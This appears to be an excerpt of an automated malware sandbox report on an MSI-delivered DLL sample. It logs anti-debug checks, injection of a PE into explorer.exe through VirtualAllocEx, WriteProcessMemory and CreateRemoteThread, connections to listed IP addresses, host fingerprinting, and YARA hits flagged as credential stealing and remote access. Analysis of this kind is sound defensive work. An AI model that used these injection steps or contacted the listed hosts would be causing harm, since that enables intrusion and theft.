Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FBD0A5 IsDebuggerPresent,OutputDebugStringW, 4_2_00FBD0A5
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FE2DCC mov ecx, dword ptr fs:[00000030h] 4_2_00FE2DCC
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FEAD78 mov eax, dword ptr fs:[00000030h] 4_2_00FEAD78
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FB2310 GetProcessHeap, 4_2_00FB2310
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\Installer\MSIF29D.tmp "C:\Windows\Installer\MSIF29D.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FD33A8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_00FD33A8
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FD353F SetUnhandledExceptionFilter, 4_2_00FD353F
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FD2968 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_00FD2968
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FD6E1B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_00FD6E1B
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000001800402A0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00000001800402A0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018005C2BC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_000000018005C2BC

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\rundll32.exe Network Connect: 82.115.223.39 8041
Source: C:\Windows\explorer.exe Network Connect: 188.114.96.3 443
Source: C:\Windows\System32\rundll32.exe Network Connect: 80.78.24.30 8041
Source: C:\Windows\System32\rundll32.exe Memory allocated: C:\Windows\explorer.exe base: 3050000 protect: page execute and read and write
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00007DF459570100 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread, 6_3_00007DF459570100
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000273F41380 Sleep,SleepEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject, 6_2_0000000273F41380
Source: C:\Windows\System32\rundll32.exe Thread created: C:\Windows\explorer.exe EIP: 3050000
Source: C:\Windows\System32\rundll32.exe Memory written: C:\Windows\explorer.exe base: 3050000 value starts with: 4D5A
Source: C:\Windows\System32\rundll32.exe Memory written: PID: 1028 base: 3050000 value: 4D
Source: C:\Windows\System32\rundll32.exe Thread register set: 5880 1
Source: C:\Windows\System32\rundll32.exe Memory written: C:\Windows\explorer.exe base: 3050000
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FB52F0 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcessId,AllowSetForegroundWindow,GetModuleHandleW,GetProcAddress,GetProcessId,Sleep,Sleep,EnumWindows,BringWindowToTop,WaitForSingleObject,GetExitCodeProcess, 4_2_00FB52F0
Source: C:\Windows\Installer\MSIF29D.tmp Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState
Source: explorer.exe, 00000008.00000000.2452717662.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3346806877.0000000009BB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094015474.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd=
Source: explorer.exe, 00000008.00000002.3332339160.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2447498972.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000008.00000000.2449712553.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3332339160.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2447498972.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000008.00000002.3332339160.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2447498972.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000008.00000002.3332339160.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2447498972.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000008.00000002.3331052313.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2446927908.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PProgman
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FD35A9 cpuid 4_2_00FD35A9
Source: C:\Windows\Installer\MSIF29D.tmp Code function: EnumSystemLocalesW, 4_2_00FEE0C6
Source: C:\Windows\Installer\MSIF29D.tmp Code function: EnumSystemLocalesW, 4_2_00FEE1AC
Source: C:\Windows\Installer\MSIF29D.tmp Code function: EnumSystemLocalesW, 4_2_00FE7132
Source: C:\Windows\Installer\MSIF29D.tmp Code function: EnumSystemLocalesW, 4_2_00FEE111
Source: C:\Windows\Installer\MSIF29D.tmp Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 4_2_00FEE237
Source: C:\Windows\Installer\MSIF29D.tmp Code function: GetLocaleInfoEx, 4_2_00FD23F8
Source: C:\Windows\Installer\MSIF29D.tmp Code function: GetLocaleInfoW, 4_2_00FEE48A
Source: C:\Windows\Installer\MSIF29D.tmp Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 4_2_00FEE5B3
Source: C:\Windows\Installer\MSIF29D.tmp Code function: GetLocaleInfoW, 4_2_00FEE6B9
Source: C:\Windows\Installer\MSIF29D.tmp Code function: GetLocaleInfoW, 4_2_00FE76AF
Source: C:\Windows\Installer\MSIF29D.tmp Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 4_2_00FEE788
Source: C:\Windows\Installer\MSIF29D.tmp Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 4_2_00FEDE24
Source: C:\Windows\System32\rundll32.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 6_2_0000000180053038
Source: C:\Windows\System32\rundll32.exe Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW, 6_2_0000000180052534
Source: C:\Windows\System32\rundll32.exe Code function: EnumSystemLocalesW, 6_2_0000000180052904
Source: C:\Windows\System32\rundll32.exe Code function: EnumSystemLocalesW, 6_2_00000001800529D4
Source: C:\Windows\System32\rundll32.exe Code function: GetLocaleInfoW, 6_2_0000000180048A24
Source: C:\Windows\System32\rundll32.exe Code function: EnumSystemLocalesW, 6_2_0000000180047A78
Source: C:\Windows\System32\rundll32.exe Code function: EnumSystemLocalesW, 6_2_0000000180047BBC
Source: C:\Windows\System32\rundll32.exe Code function: EnumSystemLocalesW, 6_2_0000000180047C44
Source: C:\Windows\System32\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 6_2_0000000180052E38
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FD37D5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 4_2_00FD37D5
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CAF4D00 GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo, 6_2_000001FF4CAF4D00
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FE7B1F GetTimeZoneInformation, 4_2_00FE7B1F
Source: C:\Windows\explorer.exe Code function: 8_2_0305891C RtlGetVersion,GetVersionExW, 8_2_0305891C
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 6.2.rundll32.exe.1ff4b020000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.rundll32.exe.1ff4b0a0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.rundll32.exe.1ff4b0a0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.3332247627.000001FF4B020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3332368718.000001FF4B0A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2444968399.000001FF4CA6D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5880, type: MEMORYSTR
Source: Yara match File source: 00000006.00000002.3332076257.000001FF4AE58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3353267482.000000000E6CB000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 1028, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 6.2.rundll32.exe.1ff4b020000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.rundll32.exe.1ff4b0a0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.rundll32.exe.1ff4b0a0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.3332247627.000001FF4B020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3332368718.000001FF4B0A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2444968399.000001FF4CA6D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5880, type: MEMORYSTR
Source: Yara match File source: 00000006.00000002.3332076257.000001FF4AE58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3353267482.000000000E6CB000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 1028, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR